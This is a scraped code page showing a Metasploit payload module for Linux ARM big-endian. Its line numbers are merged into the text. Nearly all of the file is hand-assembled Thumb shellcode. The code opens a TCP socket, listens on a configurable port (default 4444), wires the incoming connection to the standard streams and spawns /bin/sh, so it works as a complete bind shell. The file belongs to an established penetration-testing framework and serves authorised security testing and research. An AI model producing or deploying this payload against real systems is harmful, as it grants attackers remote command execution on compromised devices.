Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.
Path: blob/master/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
Views: 15919
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 118910include Msf::Payload::Single11include Msf::Sessions::CommandShellOptions1213def initialize(info = {})14super(merge_info(info,15'Name' => 'Linux ARM Big Endian Command Shell, Bind TCP Inline',16'Description' => 'Listen for a connection and spawn a command shell',17'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',18'References' => [['URL', 'https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s']],19'License' => MSF_LICENSE,20'Platform' => 'linux',21'Arch' => ARCH_ARMBE,22'Handler' => Msf::Handler::BindTcp,23'Session' => Msf::Sessions::CommandShellUnix24))25# Register command execution options26register_options(27[28OptString.new('CMD', [ true, "The command to execute.", "/bin/sh" ]),29Opt::LPORT(4444)30])31end32def generate(_opts = {})33cmd = (datastore['CMD'] || '') + "\x00"34bytehigh = (datastore['LPORT'].to_i >> 8).chr35bytelow = (datastore['LPORT'].to_i & 0xFF).chr3637payload =38# turning on thumb mode39"\xe2\x8f\x60\x01" + # add r6, pc, #1 #40"\xe1\x2f\xff\x16" + # bx r6 #4142# thumb mode on43# socket(2,1,0)44"\x1a\x92" + # sub r2, r2, r2 #45"\x1c\x51" + # add r1, r2, #1 #46"\x1c\x90" + # add r0, r2, #2 #47"\x02\x0f" + # lsl r7, r1, #8 #48"\x37\x19" + # add r7, r7, #0x19 #49"\xdf\x01" + # svc 1 #50"\x1c\x06" + # mov r6, r0 #5152# bind()53"\x22\x02" + # mov r2, #2 #54"\x02\x12" + # lsl r2, r2, #8 #55"\x32"+bytehigh + # add r2, r2, #0xXX #56"\x02\x12" + # lsl r2, r2, #8 #57"\x32"+bytelow + # add r2, r2, #0xXX #58"\x1a\xdb" + # sub r3, r3, r3 #59"\x1b\x24" + # sub r4, r4, r4 #60"\x1b\x6d" + # sub r5, r5, r5 #61"\x46\x69" + # mov r1, sp #62"\xc1\x3c" + # stm r1!, {r2-r5} #63"\x39\x10" + # sub r1, #0x10 #64"\x22\x10" + # mov r2, #16 #65"\x37\x01" + # add r7, r7, #1 #66"\xdf\x01" + # svc 1 #6768# listen()69"\x1c\x30" + # mov r0, r6 #70"\x1a\x49" + # sub r1, r1, r1 #71"\x37\x02" + # add r7, r7, #2 #72"\xdf\x01" + # svc 1 #7374# accept()75"\x1c\x30" + # mov r0, r6 #76"\x1a\x92" + # sub r2, r2, r2 #77"\x37\x01" + # add r7, r7, #1 #78"\xdf\x01" + # svc 1 #79"\x1c\x06" + # mov r6, r0 #8081# dup2()82"\x1a\x49" + # sub r1, r1, r1 #83"\x27\x3f" + # mov r7, #63 #84"\xdf\x01" + # svc 1 #85"\x1c\x30" + # mov r0, r6 #86"\x31\x01" + # add r1, r1, #1 #87"\xdf\x01" + # svc 1 #88"\x1c\x30" + # mov r0, r6 #89"\x31\x01" + # add r1, r1, #1 #90"\xdf\x01" + # svc 1 #9192# execve()93"\x1a\x92" + # sub r2, r2, r2 #94"\x46\x78" + # mov r0, pc #95"\x30\x12" + # add r0, #18 #96"\x92\x02" + # str r2, [sp, #8] #97"\x90\x01" + # str r0, [sp, #4] #98"\xa9\x01" + # add r1, sp, #4 #99"\x27\x0b" + # mov r7, #11 #100"\xdf\x01" + # svc 1 #101102# exit()103"\x1b\x24" + # sub r4, r4, r4 #104"\x1c\x20" + # mov r0, r4 #105"\x27\x01" + # mov r7, #1 #106"\xdf\x01" + # svc 1 #107cmd108end109end110111112